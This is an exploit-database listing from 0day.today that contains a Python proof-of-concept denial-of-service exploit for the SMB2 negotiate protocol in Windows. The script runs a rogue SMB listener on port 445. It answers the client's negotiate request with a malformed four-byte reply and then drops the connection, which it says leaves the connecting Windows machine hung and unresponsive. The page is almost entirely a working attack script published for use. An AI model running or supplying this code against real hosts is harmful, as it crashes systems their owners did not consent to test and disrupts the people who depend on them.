[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Windows SMB2 Negotiate Protocol (0x72) Response DOS

Author
Jelmer de Hen
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12155
Category
dos / poc
Date add
07-05-2010
Platform
windows
===================================================
Windows SMB2 Negotiate Protocol (0x72) Response DOS
===================================================

#!/usr/bin/python
 
# === EDIT – this exploit appears to be exactly the same one of one which was already found
# and fixed notified by Laurent Gaffi?, i did not know this but his blog post can be found here:
# http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html
 
import socket,sys,time
 
print "Maliformed negotiate protocol response and quickly closing the connection causes Windows machines supporting SMB2 to crash (leaves the system hanging and unresponsive) -- tested on Win 7 build 2600"
print "Written by Jelmer de Hen"
print "Published at http://h.ackack.net/?p=387"
smb = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
smb.bind(("", 445))
smb.listen(1)
smbconn, addr = smb.accept()
print "[+] "+str(addr)+" is trying to make connection to us over port 445"
while 1:
    new_packet = smbconn.recv(1024)
    print "[+] Waiting for a negotiate request packet"
    if new_packet[8]=="r":
        print "[+] Received the negotiate request packet injecting the 4 bytes now..."
        smbconn.send("\x00\x00\x00\x01")
        break
print "[+] Closing connection... This is part of the exploit"
smbconn.close()
print "[+] Done, if all went good then the box on the other side crashed"



#  0day.today [2024-12-25]  #